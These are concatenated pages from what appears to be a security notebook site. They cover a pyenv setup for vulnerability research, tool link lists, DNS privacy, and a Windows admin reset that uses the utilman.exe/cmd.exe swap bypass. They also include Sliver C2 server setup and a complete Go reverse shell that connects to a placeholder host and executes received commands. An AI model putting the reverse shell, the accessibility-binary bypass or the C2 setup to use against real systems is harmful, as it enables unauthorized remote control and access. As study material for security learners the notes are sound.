Python environments with pyenv for security and CVE research. It assumes basic terminal familiarity and a non‑privileged user account. * * * ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#overview) Overview This guide has three goals: * Make environments **reproducible** across machines and distros. * Keep each target’s tooling **isolated** from others. * Provide a **standard pattern** you can reuse for every Python security research project. The workflow: 1. Install system build dependencies (per Linux family). 2. Install pyenv and pyenv‑virtualenv. 3. Use a standard “research environment template” for each target project. * * * ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#prerequisites) Prerequisites * A Linux host (VM or physical), using one of: * Debian / Ubuntu * Fedora / RHEL / CentOS * Arch / Manjaro * A regular non‑root user account with `sudo` access. * Basic familiarity with a shell (`bash` or `zsh`). For security work, using a dedicated research VM or container is strongly recommended. * * * ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-1-install-os-build-dependencies) Step 1: Install OS Build Dependencies Install the libraries required to build Python from source. Run the block that matches your distribution family. ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#debian-ubuntu) Debian / Ubuntu ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#fedora-rhel-centos) Fedora / RHEL / CentOS For Fedora or newer RHEL/CentOS that use `dnf`: For older RHEL/CentOS that use `yum`, replace `dnf` with `yum` in the commands above. ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#arch-manjaro) Arch / Manjaro If a package name is missing on your specific distro/version, install the closest `*-dev` or `*-devel` equivalent for: * OpenSSL * zlib * bz2 * readline * sqlite * ncurses * tk * libffi * lzma (xz) * * * ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-2-install-pyenv-any-linux) Step 2: Install pyenv (Any Linux) This section is distro‑agnostic. 1. Install pyenv with the official installer: 2. Add pyenv to your shell startup file. For Bash (`~/.bashrc`): For Zsh (`~/.zshrc`): 3. Reload your shell: 4. Confirm installation: If this prints a version, pyenv is installed correctly. * * * ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-3-standard-research-environment-template) Step 3: Standard Research Environment Template Use the same pattern for each Python target you analyze. Only update a few variables per project. ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#template-variables) Template Variables Pick values per target: * `TARGET_NAME` should match the project or repo. * `PY_VERSION` is the Python version you want to test (you can repeat this for multiple versions). * `ENV_NAME` combines both for clarity. * `WORK_ROOT` is a single directory where all security work lives. ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#environment-creation-script) Environment Creation Script Run this block in a shell after setting the variables: At this point: * Entering `"$WORK_ROOT/$TARGET_NAME"` will automatically select `"$ENV_NAME"` (due to `pyenv local`). * The environment contains a consistent set of security and dev tools. * You can now clone and install the target project into this environment. * * * ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-4-using-the-environment-for-a-target-project) Step 4: Using the Environment for a Target Project Once the environment is ready: 1. Go to the workspace: 2. Clone the target repository into this directory (example): 3. Ensure the correct environment is active: 4. Install project dependencies (examples): (Adjust filenames according to the project.) From here, run tests, static analysis tools, proof‑of‑concept scripts, and exploit code in this environment without affecting other projects. * * * ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-5-rebuilding-an-environment-later) Step 5: Rebuilding an Environment Later On a new machine or VM: 1. Repeat **Step 1** and **Step 2** for the new system. 2. Recreate the environment with the same variables: 3. Rebuild the environment: If you keep `tools-baseline.txt`, `project-requirements.txt`, and the scripts in version control (for example, a private “security-envs” or “research-environments” repo), you can reconstruct setups with high fidelity. * * * ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#python-security-tooling) Python Security tooling Alongside pyenv and virtualenv, a base Python tooling set that you can install into each project’s env is: * Static analysis / SAST: `bandit`, `pip-audit`, and optionally `safety` for dependency checks, plus `mypy` for type checking.​ * Testing and coverage: `pytest`, `coverage`, and `hypothesis` for property‑based testing and fuzz‑like input generation.​ * General dev utilities: `black`, `isort`, `flake8` or `ruff` to keep your own scripts consistent and easier to maintain across projects.​ * * * ### [](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#recommended-practices-for-security-research) Good Practices for Security Research * Use dedicated VMs or containers per project or per group of related projects. * Avoid using the system Python for any research tasks. * Snapshot your VM after completing this setup so future projects can start from a clean baseline. * Prefer non‑privileged users and minimal permissions, especially when running proof‑of‑concept exploits. [PreviousCVE Hunting Python Repos with VulnHunter](https://martian1337.gitbook.io/notes/notes/security-research/cve-hunting-python-repos-with-vulnhunter) [NextProgramming](https://martian1337.gitbook.io/notes/notes/coding-programming) Last updated 6 months ago * [Overview](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#overview) * [Prerequisites](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#prerequisites) * [Step 1: Install OS Build Dependencies](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-1-install-os-build-dependencies) * [Debian / Ubuntu](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#debian-ubuntu) * [Fedora / RHEL / CentOS](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#fedora-rhel-centos) * [Arch / Manjaro](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#arch-manjaro) * [Step 2: Install pyenv (Any Linux)](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-2-install-pyenv-any-linux) * [Step 3: Standard Research Environment Template](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-3-standard-research-environment-template) * [Template Variables](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#template-variables) * [Environment Creation Script](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#environment-creation-script) * [Step 4: Using the Environment for a Target Project](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-4-using-the-environment-for-a-target-project) * [Step 5: Rebuilding an Environment Later](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#step-5-rebuilding-an-environment-later) * [Python Security tooling](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#python-security-tooling) * [Good Practices for Security Research](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research#recommended-practices-for-security-research) Copy sudo apt update sudo apt install -y \ build-essential curl \ libssl-dev zlib1g-dev libbz2-dev libreadline-dev \ libsqlite3-dev libncursesw5-dev xz-utils tk-dev \ libxml2-dev libxmlsec1-dev libffi-dev liblzma-dev Copy sudo dnf groupinstall -y "Development Tools" sudo dnf install -y \ curl openssl-devel zlib-devel bzip2 bzip2-devel \ readline-devel sqlite sqlite-devel \ ncurses-devel xz xz-devel tk-devel \ libffi-devel Copy sudo pacman -Syu --noconfirm sudo pacman -S --noconfirm \ base-devel curl \ openssl zlib xz tk \ sqlite ncurses bzip2 \ libffi Copy curl https://pyenv.run | bash Copy echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc echo 'eval "$(pyenv init -)"' >> ~/.bashrc echo 'eval "$(pyenv virtualenv-init -)"' >> ~/.bashrc Copy echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.zshrc echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.zshrc echo 'eval "$(pyenv init -)"' >> ~/.zshrc echo 'eval "$(pyenv virtualenv-init -)"' >> ~/.zshrc Copy exec $SHELL -l Copy pyenv --version Copy TARGET_NAME="sagemaker-python-sdk" # descriptive project name PY_VERSION="3.11.8" # Python version under test ENV_NAME="${TARGET_NAME}-${PY_VERSION}" WORK_ROOT="$HOME/sec-research" # root directory for all research Copy # 1) Ensure the desired Python version is available (idempotent) pyenv install -s "$PY_VERSION" # 2) Create an isolated virtualenv for this target pyenv virtualenv "$PY_VERSION" "$ENV_NAME" # 3) Create and enter a workspace directory for this target mkdir -p "$WORK_ROOT/$TARGET_NAME" cd "$WORK_ROOT/$TARGET_NAME" # 4) Pin the virtualenv to this directory pyenv local "$ENV_NAME" # 5) Activate the environment pyenv activate "$ENV_NAME" # 6) Install global research tools you want on every project python -m pip install -U pip wheel setuptools python -m pip install -U \ pytest coverage \ bandit pip-audit \ black isort \ mypy # 7) Freeze the baseline toolset for reproducibility pip freeze > tools-baseline.txt Copy cd "$WORK_ROOT/$TARGET_NAME" Copy git clone https://github.com/aws/sagemaker-python-sdk.git cd sagemaker-python-sdk Copy pyenv activate "$ENV_NAME" Copy python -m pip install -r requirements.txt 2>/dev/null || true python -m pip install -r dev-requirements.txt 2>/dev/null || true Copy TARGET_NAME="sagemaker-python-sdk" PY_VERSION="3.11.8" ENV_NAME="${TARGET_NAME}-${PY_VERSION}" WORK_ROOT="$HOME/sec-research" Copy pyenv install -s "$PY_VERSION" pyenv virtualenv "$PY_VERSION" "$ENV_NAME" mkdir -p "$WORK_ROOT/$TARGET_NAME" cd "$WORK_ROOT/$TARGET_NAME" pyenv local "$ENV_NAME" pyenv activate "$ENV_NAME" # restore baseline tools pip install -r tools-baseline.txt # restore project-specific dependencies if you saved them pip install -r project-requirements.txt 2>/dev/null || true --- # AI | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/ai-and-ml.md) . [](https://martian1337.gitbook.io/notes/resources/ai-and-ml#ai-security-frameworks) AI Security Frameworks --------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/resources/ai-and-ml#owasp-genai-security-project) OWASP GenAI Security Project [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgenai.owasp.org%2Fwp-content%2Fuploads%2F2024%2F04%2Ffavicon-200x200.png%3Fcrop%3D1&width=20&dpr=3&quality=100&sign=39c4bf66&sv=2)OWASP GenAI Security Project Threat Defense COMPASS 1.0OWASP Gen AI Security Project](https://genai.owasp.org/resource/owasp-genai-security-project-threat-defense-compass-1-0/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgenai.owasp.org%2Fwp-content%2Fuploads%2F2024%2F04%2Ffavicon-200x200.png%3Fcrop%3D1&width=20&dpr=3&quality=100&sign=39c4bf66&sv=2)OWASP GenAI Security Project - Threat Defense COMPASS RunBookOWASP Gen AI Security Project](https://genai.owasp.org/resource/owasp-genai-security-project-threat-defense-compass-runbook/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgenai.owasp.org%2Fwp-content%2Fuploads%2F2024%2F04%2Ffavicon-200x200.png%3Fcrop%3D1&width=20&dpr=3&quality=100&sign=39c4bf66&sv=2)LLMRisks ArchiveOWASP Gen AI Security Project](https://genai.owasp.org/llm-top-10/) ### [](https://martian1337.gitbook.io/notes/resources/ai-and-ml#nist-ai-rmf) NIST AI RMF [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.nist.gov%2Fthemes%2Fcustom%2Fnist_www%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=e8e779da&sv=2)AI Risk Management FrameworkNIST](https://www.nist.gov/itl/ai-risk-management-framework) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fairc.nist.gov%2Fimg%2Fuse_aihead.png&width=20&dpr=3&quality=100&sign=b1c9a9de&sv=2)Playbook - AIRCNIST AI Resource Center](https://airc.nist.gov/airmf-resources/playbook/) * * * [](https://martian1337.gitbook.io/notes/resources/ai-and-ml#ai-for-cybersecurity) AI for Cybersecurity ----------------------------------------------------------------------------------------------------------- **Open AI GPTs** [Kali GPT](https://chatgpt.com/g/g-uRhIB5ire-kali-gpt) – Generates payloads, guides tools such as Metasploit or Hydra, and explains techniques step by step. [Bug Hunter GPT](https://chatgpt.com/g/g-y2KnRe0w4-bug-hunter-gpt) – Find XSS, SQLi, CSRF; Weapon PoCs step by step. [MalwareDev GPT](https://chatgpt.com/g/g-wj8qtb7Ys-malware-dev-tutor) – Develops and analyzes malware in controlled environments. [OSINT GPT](https://chatgpt.com/g/g-ysjJG1VjM-osint-gpt) - Focuses on automating open intelligence, used to collect data leaks, investigate social media profiles, create feature maps for social engineering, etc [FraudGPT](https://chatgpt.com/g/g-6735eb60a2788190a775212c6efecd79-fraud-analyst-gpt) – Simulates fraud to test defenses. Ethical and laboratory use. **Public Tools** [OSINT GPT](https://github.com/estebanpdl/osintgpt) – Collects public information: leaks, social networks, dorks, domains and more. [Pentest GPT](https://pentestgpt.ai/) – Scans, exploits, documents. Track OWASP flows and generate reports. [DeepHat](https://www.deephat.ai/) – Automates offensive exploits, scripts, and analysis. Hexstrike AI - [https://github.com/0x4m4/hexstrike-ai/](https://github.com/0x4m4/hexstrike-ai/) White Rabbit Neo – Automates offensive exploits, scripts, and analysis. Think like a red team. [PreviousReverse Engineering](https://martian1337.gitbook.io/notes/resources/reverse-engineering) [NextProduct Security Engineering](https://martian1337.gitbook.io/notes/notes/product-security-engineering) Last updated 1 month ago * [AI Security Frameworks](https://martian1337.gitbook.io/notes/resources/ai-and-ml#ai-security-frameworks) * [OWASP GenAI Security Project](https://martian1337.gitbook.io/notes/resources/ai-and-ml#owasp-genai-security-project) * [NIST AI RMF](https://martian1337.gitbook.io/notes/resources/ai-and-ml#nist-ai-rmf) * [AI for Cybersecurity](https://martian1337.gitbook.io/notes/resources/ai-and-ml#ai-for-cybersecurity) --- # Reverse Engineering | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/reverse-engineering.md) . [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F0xinfection.xyz%2Freversing%2Fgitbook%2Fimages%2Fapple-touch-icon-precomposed-152.png&width=20&dpr=3&quality=100&sign=607b324d&sv=2)Introduction · Reverse Engineering0xinfection.github.io](https://0xinfection.github.io/reversing/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - mandiant/GoReSym: Go symbol recovery toolGitHub](https://github.com/mandiant/GoReSym) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - airbus-cyber/ghidralligatorGitHub](https://github.com/airbus-cyber/ghidralligator) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)SkyPenguinLabsGitHub](https://github.com/SkyPenguinLabs) #### [](https://martian1337.gitbook.io/notes/resources/reverse-engineering#tools) Tools [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fcutter.re%2Fassets%2Fimages%2Ffavicon.png&width=20&dpr=3&quality=100&sign=3f880cb6&sv=2)CutterCutter](https://cutter.re/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - NationalSecurityAgency/ghidra: Ghidra is a software reverse engineering (SRE) frameworkGitHub](https://ghidra-sre.org/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fhex-rays.com%2Fhubfs%2FIco-logo.png&width=20&dpr=3&quality=100&sign=21320c35&sv=2)IDA Free: Disassembler & Decompiler at No Costhex-rays.com](https://hex-rays.com/ida-free) Static Analysis [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Ffrida.re%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=6c1b1e9e&sv=2)Frida • A world-class dynamic instrumentation toolkitFrida • A world-class dynamic instrumentation toolkit](https://frida.re/) Windows Only [https://debugger.immunityinc.com/debugger.immunityinc.com](https://debugger.immunityinc.com/) Android [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - skylot/jadx: Dex to Java decompilerGitHub](https://github.com/skylot/jadx) Plugins [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - mooncat-greenpy/Ghidra\_GolangAnalyzerExtension: Analyze Golang with GhidraGitHub](https://github.com/mooncat-greenpy/Ghidra_GolangAnalyzerExtension) [PreviousProgramming](https://martian1337.gitbook.io/notes/resources/coding) [NextAI](https://martian1337.gitbook.io/notes/resources/ai-and-ml) Last updated 6 months ago --- # Privacy-Focused DNS Configuration Guides | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides.md) . The configuration described using OPNsense’s Unbound DNS resolver set up with DNS over TLS (DoT) to encrypt all DNS queries, combined with Pi-hole on the same host to provide network-wide ad-blocking, with strict firewall rules and DNS redirect rules to prevent leaks, is currently one of the most private and secure DNS setups available for a home or small office network. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides#why-this-is-highly-private) Why This Is Highly Private * **DoT Encryption**: Encrypting all DNS traffic from OPNsense to upstream DNS servers with DoT protects against eavesdropping and man-in-the-middle attacks over the internet. * **Pi-hole Integration**: Pi-hole filters out ads, trackers, and malware domains locally while forwarding DNS queries securely to the encrypted Unbound resolver, ensuring privacy and control over DNS resolution. * **Firewall and NAT Rules**: Enforcing clients to use Pi-hole for DNS and blocking or redirecting all other DNS traffic prevents DNS leaks or bypasses that could reveal queries unencrypted. * **Local Recursive Resolution**: Unbound can be configured as a validating, recursive resolver, which reduces reliance on third-party DNS providers, further limiting data exposure. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides#potential-additional-privacy-enhancements) Potential Additional Privacy Enhancements * Using a self-hosted, fully recursive Unbound instance on OPNsense without forwarding (making your own DNS root queries) enhances privacy but may require more maintenance and resources. * Combining DNS over HTTPS (DoH) alongside or instead of DoT could obscure DNS traffic further within HTTPS traffic, although OPNsense natively supports DoT best. * Regularly updating blocklists in Pi-hole and enabling DNSSEC validation in Unbound adds further robustness. * Using privacy-focused upstream DNS providers (e.g., Quad9, Cloudflare with privacy features) is recommended. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides#summary) Summary This setup represents a strong privacy-first DNS architecture for most users. It securely encrypts DNS, controls DNS traffic flow on the network, and filters unwanted content, all with open-source components and configurable controls. [PreviousPersonal Information Removal Services](https://martian1337.gitbook.io/notes/digital-privacy/personal-information-removal-services) [NextPrivate and Secure DNS with Pi-hole and Unbound](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound) Last updated 8 months ago * [Why This Is Highly Private](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides#why-this-is-highly-private) * [Potential Additional Privacy Enhancements](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides#potential-additional-privacy-enhancements) * [Summary](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides#summary) --- # IT Tasks | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-it-tasks.md) . [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-it-tasks#reset-local-windows-administrator-password) Reset local Windows Administrator Password -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #### [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-it-tasks#reset-utility-manager) Reset Utility Manager 1. Hold Shift Key and Click Restart until windows blue boot menu 2. Open troubleshoot menu and command prompt 3. Type and submit the below command 1. `cd c:\windows\system32` 4. Next type `ren utilman.exe utilman.bak.exe` 5. Next `copy cmd.exe utilman.exe` 6. After copying the file run command, `wpeutil reboot` #### [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-it-tasks#reset-admin-account) Reset Admin Account 1. Use Windows key + U to open command prompt 2. Ensure the administrator account is active by typing this command: 1. `net user administrator /active:yes` 3. Next, reset the password by typing `net user administrator ` 4. Close command prompt and restart Windows #### [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-it-tasks#restore-and-clean-up-utilman-config) Restore and Clean up Utilman config 1. Login with new password 2. Open command prompt as administrator 3. Type the below commands and execute one at a time 1. `cd c:\windows\system32` 2. `del Utilman.exe` 3. `ren utilman.exe.bak utilman` Reset previously locked admin account by going to Computer Management and modifying the user password [PreviousCommon System Task Info](https://martian1337.gitbook.io/notes/notes/common-system-task-info) [NextLinux Basics](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs) Last updated 1 year ago --- # Red Team Infrastructure | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure.md) . ### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure#c2-setup-guides) C2 Setup Guides #### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure#sliver) Sliver * [Official Docs](https://sliver.sh/docs?name=Getting+Started) * [https://cra.sh/public\_html/strlcpy3/beginners-guide-to-sliver-c2](https://cra.sh/public_html/strlcpy3/beginners-guide-to-sliver-c2) **Sliver TeamServer Setup** Copy sudo systemctl stop sliver && cat /root/.sliver/configs/server.json Use the below config and set the port: Copy { "daemon_mode": true, "daemon": { "host": "", "port": }, "logs": { "level": 4, "grpc_unary_payloads": false, "grpc_stream_payloads": false, "tls_key_logger": false }, "jobs": { "multiplayer": null }, "watch_tower": null, "go_proxy": "" After setting the config, run the below command #### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure#havoc) Havoc * [Hovoc Installer Docs](https://havocframework.com/docs/installation) ### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure#c2-server-domain-names) C2 Server Domain Names * [https://lots-project.com/](https://lots-project.com/) * [https://www.expireddomains.net/expired-domains/](https://www.expireddomains.net/expired-domains/) [PreviousRed Teaming](https://martian1337.gitbook.io/notes/notes/offensive-security) [NextRed Team OPSEC Playbook](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook) Last updated 6 months ago * [C2 Setup Guides](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure#c2-setup-guides) * [C2 Server Domain Names](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure#c2-server-domain-names) Copy sudo systemctl daemon-reload && sudo systemctl start sliver --- # General Cybersecurity | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/general-cybersecurity.md) . [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - mattnotmax/cyberchef-recipes: A list of cyber-chef recipes and curated linksGitHub](https://github.com/mattnotmax/cyberchef-recipes) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fit-tools.tech%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=b44c0b94&sv=2)IT Tools - Handy online tools for developersittoolsdottech](https://it-tools.tech/) [PreviousDefensive](https://martian1337.gitbook.io/notes/resources/defensive-cybersecurity) [NextCybersecurity Operating Systems](https://martian1337.gitbook.io/notes/resources/general-cybersecurity/cybersecurity-operating-systems) Last updated 1 year ago --- # Golang | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/coding-programming/golang.md) . [](https://martian1337.gitbook.io/notes/notes/coding-programming/golang#introduction) Introduction ------------------------------------------------------------------------------------------------------- This module within the Martian Defense gitbook goes over the Go programming language. The Go programming language is used quite often in the cyber security world and is much more worth it to learn than you might think. For context, Go is a statically typed, machine code compiled and versatile programming language that can be used for many security specific tasks such as reverse shells, cryptography, networking, server side and client side development and even malware development. [](https://martian1337.gitbook.io/notes/notes/coding-programming/golang#undefined) -------------------------------------------------------------------------------------- [PreviousXML Basics with Python](https://martian1337.gitbook.io/notes/notes/coding-programming/python/xml-basics-with-python) [NextTheory](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/theory) Last updated 1 year ago * [Introduction](https://martian1337.gitbook.io/notes/notes/coding-programming/golang#introduction) * [](https://martian1337.gitbook.io/notes/notes/coding-programming/golang#undefined) --- # Golang Snippets | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/golang-snippets.md) . Golang Reverse Shell The code above creates a socket connection to a remote host at the specified IP address and port number. It then enters a loop where it waits for a command to be sent from the remote host. Once a command is received, it is executed using the `exec.Command()` method, and the output and error messages are sent back to the remote host. Copy package main import ( "bufio" // for reading from the socket "net" // for creating a socket connection "os/exec" // for running commands "strings" // for trimming whitespace from input "strconv" // for converting the port number to a string ) const ( REMOTE_HOST = "10.X.X.X" // the IP address of the remote host REMOTE_PORT = 4231 // the port to connect to on the remote host ) func main() { // Connect to the remote host conn, err := net.Dial("tcp", REMOTE_HOST+":"+strconv.Itoa(REMOTE_PORT)) if err != nil { // If there was an error, panic panic(err) } // Defer closing the connection until the function returns defer conn.Close() println("Connected to remote host.") for { println("Awaiting command...") // Read a message from the remote host message, err := bufio.NewReader(conn).ReadString('\n') if err != nil { // If there was an error, panic panic(err) } // Trim leading and trailing whitespace from the message message = strings.TrimSpace(message) println("Running command:", message) // Run the command cmd := exec.Command(message) output, err := cmd.CombinedOutput() if err != nil { println("Error running command:", err) } println("Sending response...") // Send the output and error messages back to the remote host conn.Write(output) } } [PreviousCryptography and Encoding](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/cryptography-and-encoding) [NextPHP](https://martian1337.gitbook.io/notes/notes/coding-programming/php) Last updated 1 year ago --- # How to setup a GitHub Action for Code Security analysis | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/how-to-setup-a-github-action-for-code-security-analysis.md) . 1. Configure Github Actions in the Setting tab of the repo that needs to be scanned. Select Desired setting and save. ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-353fc0fd2a523e8203108bf4303ece1d4b3e1a9c%252Fa.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=c5c0992c&sv=2) 1. Now visit "Code Security and analysis in the security section of settings. You can now see that Code Scanning is available to setup. ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-901b224097a49620831b69b5ff9a57c448b3cc13%252F1%2520%281%29.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=6e8bdd0f&sv=2) 1. Click "Explore Workflows" to see all available code scanning tool options ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-1b09613d8b65b16ba46dbf8e5c322fc56b494b55%252F2.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=aecf39d&sv=2) 1. Select desired code scanning tool and edit the drafted YAML file if needed. For this example was selected: ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-a42b88b07a17394b3343030e31363a52f69e08e3%252F3.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=ab7286fc&sv=2) Note: Github will attempt to sense the language that repository is using. Notice above that Github has already that 